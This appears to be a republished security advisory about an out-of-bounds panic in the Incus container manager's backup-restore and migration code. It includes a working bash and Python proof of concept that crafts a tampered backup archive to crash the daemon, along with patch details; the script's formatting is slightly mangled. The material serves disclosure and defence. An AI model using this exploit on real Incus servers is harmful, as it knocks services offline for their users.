Listen to this Post
The vulnerability stems from a flawed bounds check inside the Incus backup‑restore and migration logic. When processing a backup archive, the code iterates over each physical snapshot using the index `i` and tries to access corresponding metadata in the `Config.Snapshots` or `Config.VolumeSnapshots` slices. The guard condition used is len(slice) >= i-1. Because this condition can be true even when `i` is equal to or larger than the actual slice length, an out‑of‑bounds access occurs when `slice
` is dereferenced. This triggers a runtime panic, crashing the Incus daemon. An attacker can craft a backup archive that includes real snapshot directories (which drive the loop index <code>i</code>) but supplies an `index.yaml` with an empty or truncated snapshot metadata array. When the daemon attempts to restore such an archive, the out‑of‑bounds panic is triggered, leading to an immediate denial of service. Repeated exploitation can keep the Incus daemon offline. The same flawed pattern also appears in the migration path, making the vulnerability exploitable in two separate code paths. The affected file is `internal/server/storage/backend.go` in the Incus source tree.
Platform: Incus
Version: v6.22.0 (and earlier)
Vulnerability: Out‑of‑bounds panic
Severity: Medium
Date: 2026-05-04
<h2 style="color: blue;">Prediction: 2026-05-04</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
Analytics indicates that a successful exploit requires authenticated access to Incus’ storage volume feature. The PoC below uses a tampered backup archive to trigger the panic.
[bash]
!/bin/bash
set -e
BASE_NAME="base-$(date +%s)"
PANIC_NAME="panic-$(date +%s)"
incus init images:alpine/edge "$BASE_NAME" --project default
incus snapshot create "$BASE_NAME" snap0 --project default
incus export "$BASE_NAME" valid_snapshot_base.tar.gz --project default
mkdir -p extract_snapshot_bounds
tar -xzf valid_snapshot_base.tar.gz -C extract_snapshot_bounds/
chmod -R u+rwX extract_snapshot_bounds/
python3 -c "
import os
import sys
base = '$BASE_NAME'
panic = '$PANIC_NAME'
with open('extract_snapshot_bounds/backup/index.yaml', 'r') as f:
lines = f.read().splitlines()
out = []
in_skip = False
skip_indent = 0
for line in lines:
line = line.replace(base, panic)
indent = len(line) - len(line.lstrip())
if in_skip:
if not line.strip():
continue
if indent > skip_indent or (indent == skip_indent and line.lstrip().startswith('-')):
continue
else:
in_skip = False
if indent > 0 and (line.lstrip().startswith('snapshots:') or line.lstrip().startswith('volume_snapshots:')):
out.append(line.split(':')[bash] + ': []')
in_skip = True
skip_indent = indent
continue
out.append(line)
with open('extract_snapshot_bounds/backup/index.yaml', 'w') as f:
f.write('\n'.join(out))
"
cd extract_snapshot_bounds/
tar -czf ../exploit_snapshot_bounds_panic.tar.gz backup/
cd ..
rm -rf extract_snapshot_bounds/ valid_snapshot_base.tar.gz
echo "[+] PoC Tarball Created: exploit_snapshot_bounds_panic.tar.gz"
How Exploit:
An authenticated Incus user runs the above script to create a specially crafted backup archive. The archive contains real snapshot directories but an empty `snapshots:` / `volume_snapshots:` list in index.yaml. Importing this archive with `incus import exploit_snapshot_bounds_panic.tar.gz –project default` causes the Incus daemon to panic and crash, resulting in a denial of service.
Protection from this CVE:
Upgrade to Incus version 6.22.1 (or any later release that includes the fix). The patch replaces the faulty condition `len(slice) >= i-1` with a proper bounds check i < len(slice). For Debian systems, update to version 6.0.4-2+deb13u7 or later.
Impact:
An authenticated attacker with access to Incus’ storage volume feature can crash the Incus daemon at will. By repeatedly triggering the panic, the attacker can keep the daemon offline, causing a sustained denial of service. No data corruption or privilege escalation occurs, but availability of the Incus service is completely compromised.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
